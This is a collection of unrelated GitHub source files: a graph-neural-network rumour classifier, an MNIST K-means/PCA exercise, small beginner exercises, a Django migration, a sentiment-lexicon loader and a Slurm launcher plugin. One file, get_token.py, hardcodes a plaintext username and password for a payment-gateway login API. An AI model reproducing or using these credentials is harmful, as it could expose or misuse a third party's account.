grad\n\n# main code\nupdated_df = pd.read_csv('./data/updated_pheme_rnr1.csv').drop(['Unnamed: 0'], axis=1)\nprint(updated_df)\n\n# updated_df = updated_df.astype({'parent': str})\n\ntreeDic = {}\n\nfor index, row in updated_df.iterrows():\n if math.isnan(row['parent']):\n root_id = row['graph_index']\n \n if not treeDic.__contains__(root_id):\n treeDic[root_id] = {}\n \n indexP = 'None'\n \n else:\n # hardcode...\n# if index == 30:\n# indexP = 12\n# elif index in range(126, 140):\n# indexP = 0\n# elif index in range(194, 208):\n# indexP = 0\n# elif index in range(303, 308) or index in range(309, 316):\n# indexP = 0\n# elif index == 318:\n# indexP = 1\n# elif index == 356:\n# indexP = 8\n# elif index in range(389,393) or index in range(395,408):\n# indexP = 0\n# else:\n indexP = updated_df.loc[updated_df['id'] == row['parent'], 'node_index'].values[0]\n \n indexC = row['node_index']\n vec = json.loads(row['word_embedding'])\n vec = np.array(vec)\n treeDic[root_id][indexC] = {'parent': indexP, 'vec': vec}\n \nlabelDic = {}\nfor index, row in updated_df.iterrows():\n if row['node_index'] == 0:\n root_id = row['graph_index']\n \n if row['label'] == 'rumours':\n label = 1\n else:\n label = 0\n \n if not labelDic.__contains__(root_id):\n labelDic[root_id] = label\n \nlist_of_features = []\nedge_indices = []\nlabels = []\n\nfor i in range(1, 6426):\n feat, graph, rootFeat, rootIndex, edge_m, index2node = construct_tree(treeDic[i])\n \n list_of_features.append(feat)\n edge_indices.append(edge_m)\n labels.append(labelDic[i])\n \ndataset = GraphDataset(list_of_features, edge_indices, labels)\n\nbatch_size = 1\ntest_split = .2\nshuffle_dataset = True\nrandom_seed= 42\n\n# Creating data indices for training and validation splits:\ndataset_size = len(dataset)\nindices = list(range(dataset_size))\nsplit = int(np.floor(test_split * dataset_size))\nif shuffle_dataset :\n np.random.seed(random_seed)\n np.random.shuffle(indices)\ntrain_indices, test_indices = indices[split:], indices[:split]\n\n# Creating PT data samplers and loaders:\ntrain_sampler = SubsetRandomSampler(train_indices)\ntest_sampler = SubsetRandomSampler(test_indices)\n\ntrain_loader = DataLoader(dataset, batch_size=batch_size,\n sampler=train_sampler)\ntest_loader = DataLoader(dataset, 
batch_size=batch_size,\n sampler=test_sampler)\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nc = 1\nmodel = BaseModel(device, c).to(device)\noptimizer = torch.optim.SGD(model.parameters(), lr=0.01, momentum=0.9)\nloss_fn = nn.BCELoss()\nepochs = 5 \n\n# train model\nprint(\"=====Training model=====\")\nprint(list(model.parameters()))\nrunning_train_losses = []\nmodel.train()\nfor epoch in range(epochs):\n correct = 0\n for num, batch in enumerate(train_loader):\n \n model.zero_grad()\n optimizer.zero_grad()\n if num % 1000 == 0:\n print(\"+++++++++\")\n print(list(model.parameters()))\n output = model(batch['x'].to(device), batch['edge_index'].to(device), batch)\n loss = loss_fn(output, torch.reshape(batch['y'], (1,1)).float().to(device))\n loss.backward()\n optimizer.step()\n \n # with torch.no_grad():\n # for p in model.parameters():\n # new_val = update_function(p, p.grad, loss, 0.1)\n \n if num % 1000 == 0:\n print(list(model.parameters()))\n print(\"+++++++++\")\n \n # if output.item() >= threshold:\n # predicted = torch.LongTensor([[1]]).to('cuda')\n # else:\n # predicted = torch.LongTensor([[0]]).to('cuda')\n \n predicted = torch.round(output.data).long()\n \n if predicted == torch.reshape(batch['y'], (1,1)).to(device):\n correct += 1\n \n # if num % 250 == 0:\n # print(output)\n # print(batch['y'])\n \n if num % 1000 == 0:\n print(num)\n print(\"Loss: \", loss.item())\n \n running_train_losses.append(loss.item())\n \n print(\"Epoch %i complete! Average loss was %.4f\" % (epoch + 1, sum(running_train_losses) / len(running_train_losses)))\n print(\"Train accuracy: \" , 100.0 * (correct / 5140))\n \n# evaluate model\nprint(\"====EVALUATING MODEL====\")\ncorrect = 0\ny_true = []\ny_pred = []\nwith torch.no_grad():\n for num, batch in enumerate(test_loader):\n \n output = model(batch['x'].to(device), batch['edge_index'].to(device), batch)\n predicted = torch.round(output.data).long()\n \n # if output.item() >= threshold:\n # predicted = torch.LongTensor([[1]]).to('cuda')\n # else:\n # predicted = torch.LongTensor([[0]]).to('cuda')\n \n if predicted == torch.reshape(batch['y'], (1,1)).to(device):\n correct += 1\n \n y_true.append(torch.reshape(batch['y'], (1,1)).to(device).item())\n y_pred.append(predicted.item())\n \ntest_acc = 100.0 * (correct / 1285)\nf1 = f1_score(y_true, y_pred, average='binary')\nprint(\"Test accuracy: \", test_acc)\nprint(\"F1 Score: \", 100.0 * f1)\n ","repo_name":"huyxmai/GraphClassification","sub_path":"testingscriptBERT.py","file_name":"testingscriptBERT.py","file_ext":"py","file_size_in_byte":28046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23211795776","text":"from pickle import TRUE\r\nfrom keras.datasets import mnist\r\nfrom matplotlib import pyplot\r\nimport math\r\nfrom sklearn.naive_bayes import GaussianNB\r\nimport numpy as np\r\n\r\ndef Maximin(array, size, center_num, V):\r\n distance = [0.0] * size\r\n hcis = [0] * size\r\n centers = np.zeros((center_num, V))\r\n centers[0] = array[0]\r\n \r\n i = 0\r\n while i < size:\r\n sum = 0\r\n j = 0\r\n while j < V:\r\n sum = sum + (array[i][j] - centers[0][j]) ** 2\r\n j = j + 1\r\n distance[i] = math.sqrt(sum)\r\n hcis[i] = 0\r\n i = i + 1\r\n \r\n i = 1\r\n while i < center_num:\r\n index_max = 0\r\n dmax = 0.0\r\n j = 0\r\n while j < size:\r\n if distance[j] <= dmax:\r\n j = j + 1\r\n continue\r\n while hcis[j] < i - 1:\r\n hcis[j] = hcis[j] + 1\r\n another_sum = 0\r\n z = 0\r\n while z < V:\r\n another_sum 
= another_sum + ((array[j][z] - centers[hcis[j]][z]) ** 2)\r\n z = z + 1\r\n d = math.sqrt(another_sum)\r\n if d < distance[j]:\r\n distance[j] = d\r\n if d < dmax:\r\n break\r\n\r\n if distance[j] > dmax:\r\n dmax = distance[j]\r\n index_max = j\r\n j = j + 1\r\n distance[index_max] = 0.0\r\n centers[i] = array[index_max]\r\n i = i + 1\r\n return centers\r\n\r\n\r\n# this function calculate the new centers for the Kmeans algorithm \r\ndef NewCenters(V, data):\r\n centers = np.zeros((1, V))\r\n i = 0\r\n while i < V:\r\n sum = 0\r\n j = 0\r\n while j < len(data):\r\n sum = sum + data[j][i]\r\n j = j + 1\r\n centers[0][i] = sum\r\n i = i + 1\r\n\r\n new = np.zeros((1, V))\r\n i = 0\r\n while i < V:\r\n new[0][i] = centers[0][i] / len(data)\r\n i = i + 1\r\n return new[0]\r\n\r\n\r\ndef Kmeans(centers, array, y_train, V, plot):\r\n\r\n data1 = []\r\n train1 = []\r\n data2 = []\r\n train2 = []\r\n data3 = []\r\n train3 = []\r\n data4 = []\r\n train4 = []\r\n d = [0.0] * len(centers)\r\n\r\n while True:\r\n x1 = 0\r\n x2 = 0\r\n x3 = 0\r\n x4 = 0\r\n \r\n i = 0\r\n while i < len(array):\r\n j = 0\r\n while j < len(centers):\r\n sum = 0\r\n z = 0\r\n # euclidean distance\r\n while z < V:\r\n sum = sum + ((array[i][z] - centers[j][z]) ** 2)\r\n z = z + 1\r\n d[j] = math.sqrt(sum)\r\n j = j + 1\r\n #minimun distance\r\n min_d = min(d[0], d[1], d[2], d[3])\r\n if min_d == d[0]:\r\n data1.append([V])\r\n data1[x1] = array[i]\r\n x1 = x1+ 1\r\n train1.append(y_train[i])\r\n elif min_d == d[1]:\r\n data2.append([V])\r\n data2[x2] = array[i]\r\n x2 = x2 + 1\r\n train2.append(y_train[i])\r\n elif min_d == d[2]:\r\n data3.append([V])\r\n data3[x3] = array[i]\r\n x3 = x3 + 1\r\n train3.append(y_train[i])\r\n elif min_d == d[3]:\r\n data4.append([V])\r\n data4[x4] = array[i]\r\n x4 = x4 + 1\r\n train4.append(y_train[i])\r\n i = i + 1\r\n\r\n new = np.zeros((4, V))\r\n # find new centers \r\n new[0] = NewCenters(V, data1)\r\n new[1] = NewCenters(V, data2)\r\n new[2] = NewCenters(V, data3)\r\n new[3] = NewCenters(V, data4)\r\n\r\n # if centers did not change is the answer else run the algorithm again\r\n if np.array_equal(centers, new):\r\n break\r\n else:\r\n centers = new\r\n data1.clear()\r\n train1.clear()\r\n data2.clear()\r\n train2.clear()\r\n data3.clear()\r\n train3.clear()\r\n data4.clear()\r\n train4.clear()\r\n d = [0.0] * len(centers)\r\n # find which of the digit appears most \r\n # count the times tha appears\r\n sum1 = train1.count(max(train1, key=train1.count))\r\n sum2 = train2.count(max(train2, key=train2.count))\r\n sum3 = train3.count(max(train3, key=train3.count))\r\n sum4 = train4.count(max(train4, key=train4.count))\r\n\r\n purity = (sum1 + sum2 + sum3 + sum4) / (len(array))\r\n\r\n # [:,0] Rreturn the column 0 of the array(2D)\r\n # plot a variable to fill the data if we need to plot a graph\r\n if plot == True:\r\n data1x = np.array(data1)[:,0]\r\n data1y = np.array(data1)[:,1]\r\n data2x = np.array(data2)[:,0]\r\n data2y = np.array(data2)[:,1]\r\n data3x = np.array(data3)[:,0]\r\n data3y = np.array(data3)[:,1]\r\n data4x = np.array(data4)[:,0]\r\n data4y = np.array(data4)[:,1]\r\n pyplot.scatter(data1x, data1y, color='red')\r\n pyplot.scatter(data2x, data2y, color='green')\r\n pyplot.scatter(data3x, data3y, color='blue')\r\n pyplot.scatter(data4x, data4y, color='yellow')\r\n pyplot.scatter(centers[:, 0], centers[:, 1], c='black', s=200, alpha=1)\r\n pyplot.show()\r\n \r\n return purity\r\n\r\n# Implement the Principal Component Analysis (PCA) algorithm.\r\ndef PCA(M, V):\r\n M2 = 
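# The coordinate-by-coordinate sums in NewCenters above compute an ordinary
# centroid; assuming `data` can be viewed as an (n, V) array, the whole
# function collapses to a one-line mean over rows (helper name is mine):
import numpy as np

def new_center(data):
    # per-coordinate sum divided by the number of points == row-wise mean
    return np.asarray(data, dtype=float).mean(axis=0)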
M - np.mean(M, axis=0)\r\n covariance = np.cov(M2, rowvar=False)\r\n values, vectors = np.linalg.eigh(covariance)\r\n sorted = np.argsort(values)[::-1]\r\n sortedVectors = vectors[:, sorted]\r\n vectorSubset = sortedVectors[:, 0:V]\r\n reduced = np.dot(vectorSubset.transpose(), M2.transpose()).transpose()\r\n\r\n return reduced\r\n\r\ndef main():\r\n \r\n #load data from mnist where x image (as array), where y the answer\r\n (train_X, train_y), (test_X, test_y) = mnist.load_data()\r\n \r\n temp = []\r\n# temp_y= []\r\n i = 0\r\n # load only a subset of it, consisting of the classes (digits) i = 1, 3, 7, 9\r\n while i < len(train_y):\r\n if (train_y[i] == 1) | (train_y[i] == 3) | (train_y[i] == 7) | (train_y[i] == 9):\r\n #get the positions of 1,3,7,9\r\n temp.append(i); \r\n # temp_x.append(train_X[i])\r\n # temp_y.append(train_y[i])\r\n i = i + 1\r\n \r\n #x y _train has only the 1 3 5 7 9\r\n x_train = train_X[temp]\r\n y_train = train_y[temp]\r\n temp = []\r\n i = 0\r\n #same for test\r\n while i < len(test_y):\r\n if (test_y[i] == 1) | (test_y[i] == 3) | (test_y[i] == 7) | (test_y[i] == 9):\r\n temp.append(i)\r\n # temp_x_test.append(test_X[i])\r\n # temp_y_test.append(test_y[i])\r\n i = i + 1\r\n \r\n X_test = test_X[temp]\r\n Y_test = test_y[temp]\r\n\r\n # x_train = temp_x\r\n # y_train = temp_y\r\n # X_test = temp_x_test\r\n # Y_test = temp_y_test\r\n\r\n \r\n #After calculating the two-dimensional features for each sample in M, use them to create a matrix M' \r\n M = np.zeros((len(x_train), 2))\r\n \r\n i = 0 \r\n # the first feature component is the mean pixel value of all image matrix \r\n # rows with odd index, while the second feature component is calculated as the mean pixel\r\n # value of all image matrix columns whose index is an even number \r\n while i < (len(x_train)):\r\n \r\n odd = 0\r\n even = 0\r\n j = 0\r\n while j < 28:\r\n #check if it is odd or even\r\n if j % 2 != 0:\r\n z = 0\r\n while z < 28:\r\n odd = odd + x_train[i][j][z]\r\n z = z +1\r\n j = j + 1\r\n\r\n j = 0\r\n while j < 28:\r\n if j % 2 == 0:\r\n z = 0\r\n while z < 28:\r\n even = even + x_train[i][z][j]\r\n z = z + 1\r\n j = j + 1\r\n odd = odd / 392.0\r\n even = even / 392.0\r\n M[i][0] = odd\r\n M[i][1] = even\r\n i = i + 1\r\n\r\n \r\n #Use a scatter plot to visualize all rows of M' ... 
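# The eigh-on-covariance route in PCA above is equivalent to an SVD of the
# centered data: the right singular vectors are the principal axes, already
# sorted by variance. A sketch assuming rows are samples; its output matches
# the eigendecomposition version up to a sign per component.
import numpy as np

def pca_svd(M, V):
    M2 = M - np.mean(M, axis=0)                 # center each column
    _, _, Vt = np.linalg.svd(M2, full_matrices=False)
    return M2 @ Vt[:V].T                        # project onto the top V axes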
assign different colors for different class samples\r\n    x1 = []\r\n    y1 = []\r\n    x3 = []\r\n    y3 = []\r\n    x7 = []\r\n    y7 = []\r\n    x9 = []\r\n    y9 = []\r\n    \r\n    i = 0 \r\n    # separation of each class\r\n    while i < (len(x_train)):\r\n        if y_train[i] == 1:\r\n            x1.append(M[i][0])\r\n            y1.append(M[i][1])\r\n\r\n        if y_train[i] == 3:\r\n            x3.append(M[i][0])\r\n            y3.append(M[i][1])\r\n\r\n        if y_train[i] == 7:\r\n            x7.append(M[i][0])\r\n            y7.append(M[i][1])\r\n\r\n        if y_train[i] == 9:\r\n            x9.append(M[i][0])\r\n            y9.append(M[i][1])\r\n        i = i + 1 \r\n    \r\n    pyplot.scatter(x1, y1, color='red')\r\n    pyplot.scatter(x3, y3, color='green')\r\n    pyplot.scatter(x7, y7, color='blue')\r\n    pyplot.scatter(x9, y9, color='yellow')\r\n    pyplot.show()\r\n    \r\n    # use your implementation of the Maximin algorithm to initialize the cluster centers in the K-Means algorithm\r\n    # 4 centers and 2 dimensions\r\n    centers = Maximin(M, len(x_train), 4, 2)\r\n    purity = Kmeans(centers, M, y_train, 2, True)\r\n    print('purity : ', purity)\r\n\r\n    # 28*28 to 784\r\n    M2 = np.zeros((len(x_train), 784), dtype=int)\r\n    i = 0\r\n    while i < len(x_train):\r\n        j = 0\r\n        while j < 784:\r\n            z = 0\r\n            while z < 28:\r\n                k = 0\r\n                while k < 28:\r\n                    M2[i][j] = x_train[i][z][k]\r\n                    j = j + 1\r\n                    k = k + 1\r\n                z = z + 1\r\n        i = i + 1 \r\n\r\n    # Apply the algorithm to reduce the dimension of rows of M, in order to get a new matrix M˜ ,\r\n    # where V = 2, 25, 50, 100 are the new numbers of dimensions\r\n\r\n    V = PCA(M2, 2)\r\n    c2 = Maximin(V, len(V), 4, 2)\r\n    purity = Kmeans(c2, V, y_train, 2, True)\r\n    print('purity for V=2 is : ', purity)\r\n\r\n    V25 = PCA(M2, 25)\r\n    c3 = Maximin(V25, len(V25), 4, 25)\r\n    purity = Kmeans(c3, V25, y_train, 25, False)\r\n    print('purity for V=25 is : ', purity)\r\n\r\n    V = PCA(M2, 50)\r\n    c4 = Maximin(V, len(V), 4, 50)\r\n    purity = Kmeans(c4, V, y_train, 50, False)\r\n    print('purity for V=50 is : ', purity)\r\n\r\n    V = PCA(M2, 100)\r\n    c5 = Maximin(V, len(V), 4, 100)\r\n    purity = Kmeans(c5, V, y_train, 100, False)\r\n    print('purity for V=100 is : ', purity)\r\n    \r\n    # Implement a Gaussian Naive Bayes Classifier. Use the rows of M˜ for V = Vmax and the\r\n    # ground truth labels of Ltr to train the classifier. Then, use the same dimensionality reduction\r\n    # process on the test data samples (rows of N), in order to obtain N˜ . Use the trained classifier\r\n    # on the new test samples (rows of N˜ ). 
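# Kmeans above hardcodes four clusters when it scores purity; the same
# measure for any clustering is: per cluster, count the most common true
# label, sum those counts, divide by the number of samples. A sketch assuming
# two equal-length 1-D label sequences (helper name is mine):
from collections import Counter

def purity_score(assignments, labels):
    by_cluster = {}
    for a, y in zip(assignments, labels):
        by_cluster.setdefault(a, []).append(y)
    majority = sum(max(Counter(ys).values()) for ys in by_cluster.values())
    return majority / len(labels)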
Use the classification results and Lte to calculate the\r\n # classification accuracy.\r\n \r\n classifier = GaussianNB()\r\n \r\n #Use the rows of M˜ for V = Vmax = 25\r\n #fit for training\r\n classifier.fit(V25, y_train)\r\n N = np.zeros((len(X_test), 784), dtype=int)\r\n i = 0\r\n while i < len(X_test):\r\n j = 0\r\n while j < 784:\r\n z = 0\r\n while z < 28:\r\n k = 0\r\n while k < 28:\r\n N[i][j] = X_test[i][z][k]\r\n j = j + 1\r\n k = k + 1\r\n z = z + 1\r\n j = j + 1 \r\n i = i + 1\r\n V_25_test = PCA(N, 25)\r\n \r\n # score = the mean accuracy on the given test data and labels\r\n score = classifier.score(V_25_test, Y_test)\r\n print(\"Naive Bayes score: \", score)\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"pkyriakou23/implement-K-means","sub_path":"clustering_ex.py","file_name":"clustering_ex.py","file_ext":"py","file_size_in_byte":11698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42088295022","text":"# 남은 일 수\nn = int(input())\n# [상담을 완료하는데 걸리는 기간, 받을 수 있는 금액]\nschedule = [list(map(int, input().split())) for _ in range(n)]\n\ncost = [0 for _ in range(n+1)] # 결과(최대 이익)\n# 마지막날부터 거꾸로 체크하면서 최대이익 찾기\nfor i in range(n-1, -1, -1):\n # i일에 상담을 하는 것이 퇴사일을 넘기면 상담을 하지 않는다.\n if schedule[i][0] + i > n:\n cost[i] = cost[i+1]\n else:\n # i일에 상담을 하는 것과 상담을 안하는 것 중 큰 것을 선택\n cost[i] = max(schedule[i][1] + cost[i + schedule[i][0]], cost[i+1])\n\nprint(max(cost))","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/삼성 SW 역량 테스트/solution20.py","file_name":"solution20.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"29696987560","text":"\"\"\"\nFaça um Programa para uma loja de tintas. O programa deverá pedir o tamanho em metros quadrados da área a ser pintada.\nConsidere que a cobertura da tinta é de 1 litro para cada 6 metros quadrados e que a tinta é vendida em latas de 18\nlitros, que custam R$ 80,00 ou em galões de 3,6 litros, que custam R$ 25,00.\nInforme ao usuário as quantidades de tinta a serem compradas e os respectivos preços em 3 situações:\n Comprar apenas latas de 18 litros;\n Comprar apenas galões de 3,6 litros;\n Misturar latas e galões, de forma que o desperdício de tinta seja menor. 
Acrescente 10% de folga e sempre arredonde\n os valores para cima, isto é, considere latas cheias.\n\"\"\"\n# from math import ceil, floor\n\n\ndef calcular_metros_quadrados(x, y):\n if x == 0 or y == 0:\n raise ValueError(\"Não pode ser 0\")\n return x * y\n\n\nif __name__ == '__main__':\n largura = 40 # float(input(\"Largura: \"))\n altura = 5.6 # float(input(\"Altura: \"))\n real_m2 = calcular_metros_quadrados(largura, altura)\n increase_10 = 10/100\n coverage = 6 # six square meters per liter\n nominal_m2 = real_m2 * (1 + increase_10) / coverage\n cans = 18\n gallons = 3.6\n a, b = divmod(nominal_m2, cans)\n b, c = (divmod(b, gallons))\n print(f'latas: {a}')\n print(f'galões: {b}')\n\n print(f'{3.6 - c} liters to complete 1 more gallon')\n","repo_name":"marcosranes/PythonEssentials","sub_path":"exercises_list/exercicio_17.py","file_name":"exercicio_17.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9242009606","text":"if __name__ == '__main__':\r\n money = int(input(\"금액을 입력하세요 : \"))\r\n print(\"환전할 금액 %d원\"%money)\r\n\r\n re1= int(money/10000)\r\n don=money%10000\r\n re2= int(don/5000)\r\n don=money%5000\r\n re3 = int(don/1000)\r\n don=money%1000\r\n re4 = int(don/ 500)\r\n\r\n print(\"10,000원권 %d장\"%re1)\r\n print(\"5,000원권 %d장\"%re2)\r\n print(\"1000원권 %d장\"%re3)\r\n print(\"500원권 %d장\" % re4)\r\n\r\n","repo_name":"JngHoon2/Academy_Python_output","sub_path":"chap01_02_list/chap01_02_grammar1/04_operator_project.py","file_name":"04_operator_project.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30500022596","text":"import requests\n\n\ndef get_new_token():\n cookies = None\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',\n 'Accept': 'application/json, text/plain, */*',\n 'Accept-Language': 'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3',\n 'Content-Type': 'application/json;charset=utf-8',\n 'Origin': 'https://birpay-gate.com',\n 'Connection': 'keep-alive',\n 'Referer': 'https://birpay-gate.com/login',\n 'Sec-Fetch-Dest': 'empty',\n 'Sec-Fetch-Mode': 'cors',\n 'Sec-Fetch-Site': 'same-origin',\n }\n\n json_data = {\n 'username': 'Operator6_Zajon_AZN',\n 'password': 'hRQLVYCJ',\n }\n\n response = requests.post('https://birpay-gate.com/api/login_check', cookies=cookies, headers=headers, json=json_data)\n if response.status_code == 200:\n token = response.json().get('token')\n with open('token.txt', 'w') as file:\n file.write(token)\n return token\n\n\n# x = get_new_token()\n# print(x)","repo_name":"Maniackaa/Project-deposite","sub_path":"birpay/get_token.py","file_name":"get_token.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7050832450","text":"#Ingreso de Datos\r\nn = int(input(\"Ingrese numero: \"))\r\nnombre = input(\"Ingresa un nombre: \")\r\n\r\n# While\r\ni = 0 # iniciando contador,\r\n # OPCIONAL\r\n # Explicar por que suele usarse el 0 como valor de inicio\r\n # Python como C/C++ entre otros son lenguajes con colecciones basadas en\r\n # Zero-based index\r\n\r\nwhile i < n: # evaluando condicion\r\n print(nombre)\r\n i += 1 # incrementando 
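# The statement above asks to always round up to full containers ("sempre
# arredonde os valores para cima"), while the divmod result in exercicio_17
# can leave fractional counts. A sketch of the mixed cans-plus-gallons case
# with explicit rounding up; the constants follow the exercise, the helper
# name is mine:
import math

def mixed_purchase(liters, can=18.0, gallon=3.6):
    cans = int(liters // can)                   # as many whole 18 L cans as fit
    rest = liters - cans * can
    gallons = math.ceil(rest / gallon)          # round the remainder up
    return cans, gallons, cans * 80.0 + gallons * 25.0

# e.g. mixed_purchase(40 * 5.6 * 1.10 / 6) -> (2, 2, 210.0)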
contador\r\n\r\n","repo_name":"katiavega/CS1100_S04","sub_path":"Ejercicio01.py","file_name":"Ejercicio01.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36296708977","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('mueble', '0005_auto_20160615_1516'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='EspecificacionMueble',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('especificacion', models.CharField(max_length=100)),\n ('ancho', models.DecimalField(decimal_places=2, max_digits=7)),\n ('largo', models.DecimalField(decimal_places=2, max_digits=7)),\n ('alto', models.DecimalField(decimal_places=2, max_digits=7)),\n ('punto', models.IntegerField()),\n ('mueble', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='mueble.Mueble')),\n ],\n options={\n 'verbose_name': 'Especificación del mueble',\n 'verbose_name_plural': 'Especificaciones del mueble',\n },\n ),\n migrations.RemoveField(\n model_name='especificaionmueble',\n name='mueble',\n ),\n migrations.DeleteModel(\n name='EspecificaionMueble',\n ),\n ]\n","repo_name":"yusnelvy/mudarte_express_backend","sub_path":"mueble/migrations/0006_auto_20160615_1544.py","file_name":"0006_auto_20160615_1544.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18003484873","text":"import io\nimport csv\nimport json\n\nfrom gensim.models import KeyedVectors\n\nfrom config import Config\n\ntaglist = []\nstop_words = []\n_word_vectors = None\nsepl = {}\npolarity_clues = {}\nsubjectivity_clues = {}\npunctuations = ['.', ',', '\"', '!', '?', '-', '_']\numlauts = {\n 'ä': 'ae',\n 'ö': 'oe',\n 'ü': 'ue',\n 'Ä': 'Ae',\n 'Ö': 'Oe',\n 'Ü': 'Ue',\n 'ß': 'ss'\n}\n\n# needed because _word_vectors reference changes when init is called\ndef get_word_vectors():\n return _word_vectors\n\n\ndef init_all_ressources():\n config = Config()\n init_taglist(config.paths['taglist'])\n init_stop_words(config.paths['stopwords'])\n init_sepl(config.paths['sepl'])\n init_polarity_clues(config.paths['polarity_clues'])\n init_subjectivity_clues(config.paths['subjectivity_clues'])\n init_word_vectors(config.paths['word_vector_model'])\n\n\ndef init_taglist(taglist_path):\n global taglist\n print('initializing taglist...')\n with io.open(taglist_path, encoding='utf-8') as file:\n reader = csv.reader(file, delimiter=';')\n for line in reader:\n taglist.append(line[0])\n\n print('initializing taglist - FINISHED')\n\n\ndef init_stop_words(stop_words_path):\n global stop_words\n\n print('initializing stop words...')\n with io.open(stop_words_path, encoding='utf-8') as file:\n stop_words = json.load(file)\n print('initializing stop words - FINISHED')\n\n\ndef init_word_vectors(word_vector_path):\n global _word_vectors\n print('initializing word vectors...')\n _word_vectors = KeyedVectors.load_word2vec_format(word_vector_path, binary=True)\n print('initializing word vectors - FINISHED')\n\n\ndef init_sepl(sepl_path):\n global sepl\n print('initializing sepl...')\n with io.open(sepl_path, encoding='utf-8') as file:\n reader = csv.reader(file, delimiter=';')\n for line in reader:\n if line[0][0] != '#':\n sepl[line[0]] = 
float(line[1])\n print('initializing sepl - FINISHED')\n\n\ndef init_polarity_clues(polarity_path):\n global polarity_clues\n print('initializing polarity clues...')\n with io.open(polarity_path, encoding='utf-8') as file:\n reader = csv.reader(file, delimiter='\\t')\n for line in reader:\n value = 0\n if line[3] == 'negative':\n value = -1\n if line[3] == 'positive':\n value = 1\n polarity_clues[line[1]] = value\n print('initializing polarity clues - FINISHED')\n\n\ndef init_subjectivity_clues(subjectivity_path):\n global subjectivity_clues\n print('initializing subjectivity clues...')\n with io.open(subjectivity_path, encoding='utf-8') as file:\n reader = csv.reader(file, delimiter='\\t')\n for line in reader:\n value = 0\n if line[3] == '1':\n value = 1\n elif line[4] == '1':\n value = -1\n subjectivity_clues[line[1]] = value\n print('initializing subjectivity clues - FINISHED')\n","repo_name":"INTER-ACT/ilai","sub_path":"services/shared_ressources.py","file_name":"shared_ressources.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20850704672","text":"import logging\nimport os\nimport time\nimport sys\nfrom pathlib import Path\nfrom typing import Any, List, Set, Sequence\n\nfrom hydra.core.singleton import Singleton\nfrom hydra.core.utils import JobReturn, filter_overrides, JobStatus\nfrom omegaconf import OmegaConf\n\nfrom hydra_plugins.hydra_submitit_launcher.submitit_launcher import SlurmLauncher\nfrom submitit.core.core import Job\nfrom hydra_plugins.hydra_submitit_extension.config import ExtendedSlurmQueueConf\nfrom hydra_plugins.hydra_submitit_extension.utils.slurm_info import QueueInfo\n\nlog = logging.getLogger(__name__)\n\nclass ExtendedSlurmLauncher(SlurmLauncher):\n ACTIVE_JOB_STATES = [\"RUNNING\",\"PENDING\",\"UNKNOWN\"]\n\n def launch(\n self, job_overrides: Sequence[Sequence[str]], initial_job_idx: int\n ) -> Sequence[JobReturn]:\n # lazy import to ensure plugin discovery remains fast\n import submitit\n\n assert self.config is not None\n\n num_jobs = len(job_overrides)\n assert num_jobs > 0\n params = self.params\n # build executor\n init_params = {\"folder\": self.params[\"submitit_folder\"]}\n specific_init_keys = {\"max_num_timeout\"}\n\n init_params.update(\n **{\n f\"{self._EXECUTOR}_{x}\": y\n for x, y in params.items()\n if x in specific_init_keys\n }\n )\n init_keys = specific_init_keys | {\"submitit_folder\"}\n executor = submitit.AutoExecutor(cluster=self._EXECUTOR, **init_params)\n\n # specify resources/parameters\n baseparams = set(OmegaConf.structured(ExtendedSlurmQueueConf).keys())\n params = {\n x if x in baseparams else f\"{self._EXECUTOR}_{x}\": y\n for x, y in params.items()\n if x not in init_keys\n }\n\n # New Parameter for ExtendendSlurmLauncher\n # They need to be removed to not suprise the\n # executor\n extended_slurm_parameter = [ \n \"reschedule_interval\",\n \"max_jobs_in_partition\",\n \"max_jobs_in_total\",\n \"max_jobs_in_sweep\"\n ]\n\n # Dont overrun the scheduler\n assert(params[\"reschedule_interval\"]>=60)\n\n executor_params = {k:v for k, v in params.items() if k not in extended_slurm_parameter}\n\n executor.update_parameters(**executor_params)\n\n log.info(\n f\"Submitit '{self._EXECUTOR}' sweep output dir : \"\n f\"{self.config.hydra.sweep.dir}\"\n )\n sweep_dir = Path(str(self.config.hydra.sweep.dir))\n sweep_dir.mkdir(parents=True, exist_ok=True)\n if \"mode\" in self.config.hydra.sweep:\n mode = 
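# Once init_sepl / init_polarity_clues above have filled the module-level
# dictionaries, scoring text is a lookup per token. A toy helper, assuming a
# populated lexicon dict and plain whitespace tokenization (the name and the
# 0.0 fallback are my choices):
def polarity_of(text, lexicon):
    tokens = text.lower().split()
    hits = [lexicon[t] for t in tokens if t in lexicon]
    return sum(hits) / len(hits) if hits else 0.0  # average clue polarity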
